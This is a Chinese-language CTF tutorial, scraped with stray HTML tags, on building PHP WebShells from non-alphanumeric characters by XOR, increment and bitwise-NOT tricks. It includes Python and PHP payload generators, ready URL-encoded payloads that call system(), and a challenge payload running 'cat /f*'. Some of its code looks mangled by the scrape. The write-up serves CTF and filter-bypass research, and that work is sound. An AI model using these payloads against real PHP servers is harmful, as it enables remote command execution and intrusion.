从CTF中学习自增构造WebShell技术详解<\/h1>

一、异或运算构造WebShell<\/h2>

基本原理<\/h3>
利用PHP中字符异或运算特性：两个字符进行异或运算可以得到新字符<\/li>
示例：
'A'^'?'<\/code> 结果为 ~<\/code>

A的ASCII码为65 (二进制: 1000001)<\/li>
?的ASCII码为63 (二进制: 0111111)<\/li>
异或结果: 1111110 (即~)<\/li>
<\/ul>
<\/li>
<\/ol>
构造步骤<\/h3>

寻找未被过滤的字符<\/strong>：通过遍历ASCII码(0-255)并过滤掉数字和字母<\/li>
构造目标字符串<\/strong>：如"system"<\/li>
匹配字符对<\/strong>：找到两个未被过滤的字符，其异或结果等于目标字符<\/li>
URL编码处理<\/strong>：对生成的不可见字符进行URL编码<\/li>
<\/ol>
Python实现代码<\/h3>
import<\/span> re
<\/span><\/span>import<\/span> urllib.request
<\/span><\/span>
<\/span><\/span>a =<\/span> []
<\/span><\/span>ans1 =<\/span> ""<\/span>
<\/span><\/span>ans2 =<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span># 获取未被过滤的字符(非数字字母)<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(0<\/span>,256<\/span>):
<\/span><\/span>    c =<\/span> chr(i)
<\/span><\/span>    tmp =<\/span> re.<\/span>match(r<\/span>'[0-9]|[a-z]'<\/span>, c, re.<\/span>I)
<\/span><\/span>    if<\/span>(tmp): continue<\/span>
<\/span><\/span>    else<\/span>: a.<\/span>append(i)
<\/span><\/span>
<\/span><\/span># 构造目标函数名和参数<\/span>
<\/span><\/span>mya =<\/span> "system"<\/span>  # 目标函数名<\/span>
<\/span><\/span>myb =<\/span> "dir"<\/span>     # 参数<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> myfun<\/span>(k, my):
<\/span><\/span>    global<\/span> ans1, ans2
<\/span><\/span>    for<\/span> i in<\/span> range(0<\/span>, len(a)):
<\/span><\/span>        for<\/span> j in<\/span> range(i, len(a)):
<\/span><\/span>            if<\/span>(a[i]^<\/span>a[j] ==<\/span> ord(my[k])):
<\/span><\/span>                ans1 +=<\/span> chr(a[i])
<\/span><\/span>                ans2 +=<\/span> chr(a[j])
<\/span><\/span>                return<\/span>
<\/span><\/span>
<\/span><\/span># 构造函数名部分<\/span>
<\/span><\/span>for<\/span> x in<\/span> range(0<\/span>, len(mya)):
<\/span><\/span>    myfun(x, mya)
<\/span><\/span>data1 =<\/span> "('"<\/span>+<\/span>urllib.<\/span>request.<\/span>quote(ans1)+<\/span>"'^'"<\/span>+<\/span>urllib.<\/span>request.<\/span>quote(ans2)+<\/span>"')"<\/span>
<\/span><\/span>
<\/span><\/span># 构造参数部分<\/span>
<\/span><\/span>ans1 =<\/span> ""<\/span>
<\/span><\/span>ans2 =<\/span> ""<\/span>
<\/span><\/span>for<\/span> k in<\/span> range(0<\/span>, len(myb)):
<\/span><\/span>    myfun(k, myb)
<\/span><\/span>data2 =<\/span> "(<\/span>\"<\/span>"<\/span>+<\/span>urllib.<\/span>request.<\/span>quote(ans1)+<\/span>"<\/span>\"<\/span>^<\/span>\"<\/span>"<\/span>+<\/span>urllib.<\/span>request.<\/span>quote(ans2)+<\/span>"<\/span>\"<\/span>)"<\/span>
<\/span><\/span>
<\/span><\/span>print(data1 +<\/span> data2)
<\/span><\/span><\/code><\/pre>二、自增构造WebShell<\/h2>
基本原理<\/h3>

利用PHP的自增运算符++<\/code>从已知字符生成其他字符<\/li>
示例：从"A"开始自增可得到后续字母<\/li>
<\/ol>
构造步骤<\/h3>

初始化变量为数组：$_=[];<\/code><\/li>
转换为字符串：$_=''.$_;<\/code> (得到"A")<\/li>
通过自增获取后续字符：
$_++<\/span>; \/\/ B
<\/span><\/span><\/span><\/span>$_++<\/span>; \/\/ C
<\/span><\/span><\/span><\/span>$_++<\/span>; \/\/ D
<\/span><\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/code><\/pre><\/li>
组合字符构造"GET"：
$__ =<\/span> $_; \/\/ 保存当前字符
<\/span><\/span><\/span><\/span>$_++<\/span>; $_++<\/span>; $_++<\/span>; \/\/ 继续自增
<\/span><\/span><\/span><\/span>$___ =<\/span> $_; \/\/ 保存新字符
<\/span><\/span><\/span>\/\/ 组合成"GET"
<\/span><\/span><\/span><\/span>$_ =<\/span> $___.<\/span>$__.<\/span>$_;
<\/span><\/span>$_ =<\/span> '_'<\/span>.<\/span>$_; \/\/ 得到"_GET"
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
最终Payload<\/h3>
URL编码后的形式：<\/p>
%24_%3D%5B%5D.''%3B%24_%3D%24_%5B''%3D%3D'%24'%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24___%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24___.%24__.%24_%3B%24_%3D'_'.%24_%3B%24%24_%5B_%5D(%24%24_%5B__%5D)%3B
<\/code><\/pre>
三、取反构造WebShell<\/h2>
基本原理<\/h3>

利用两次取反(~)得到原字符的特性<\/li>
通过URL编码不可见字符绕过过滤<\/li>
<\/ol>
PHP实现代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$ans1 =<\/span> 'system'<\/span>; \/\/ 函数名
<\/span><\/span><\/span><\/span>$ans2 =<\/span> 'dir'<\/span>;    \/\/ 命令
<\/span><\/span><\/span><\/span>
<\/span><\/span>$data1 =<\/span> ('~'<\/span>.<\/span>urlencode<\/span>(~<\/span>$ans1)); \/\/ 第一次取反并编码
<\/span><\/span><\/span><\/span>$data2 =<\/span> ('~'<\/span>.<\/span>urlencode<\/span>(~<\/span>$ans2)); \/\/ 第一次取反并编码
<\/span><\/span><\/span><\/span>
<\/span><\/span>echo<\/span> ('('<\/span>.<\/span>$data1.<\/span>')('<\/span>.<\/span>$data2.<\/span>')'<\/span>); \/\/ 输出: (~%8C%86%8C%8B%9A%92)(~%9A%89%9E)
<\/span><\/span><\/span><\/code><\/pre>最终Payload<\/h3>
(~%8C%86%8C%8B%9A%92)(~%9A%89%9E)
<\/code><\/pre>
四、实战案例：青少年CTF之ezbypass<\/h2>
题目限制<\/h3>

代码长度 ≤ 105字节<\/li>
必须是字符串<\/li>
不能包含字母、数字和@符号<\/li>
<\/ol>
构造Payload<\/h3>
code=ff=%2b%2b$_;$%ff=%2b%2b$_.$%ff;$_%2b%2b;$_%2b%2b;$%ff.=%2b%2b$_;$%ff.=%2b%2b$ff;system&__=cat \/f*
<\/code><\/pre>
技术要点<\/h3>

使用自增构造变量名<\/li>
通过短变量名减少长度<\/li>
利用URL编码绕过字符限制<\/li>
<\/ol>
五、防御措施<\/h2>

输入过滤<\/strong>：严格过滤特殊字符和运算符<\/li>
禁用危险函数<\/strong>：如eval()<\/code>、system()<\/code>等<\/li>
长度限制<\/strong>：限制输入长度防止复杂payload<\/li>
字符集限制<\/strong>：只允许特定字符集<\/li>
WAF防护<\/strong>：部署Web应用防火墙检测异常请求<\/li>
<\/ol>
以上技术仅用于CTF比赛和安全研究，请勿用于非法用途。<\/p>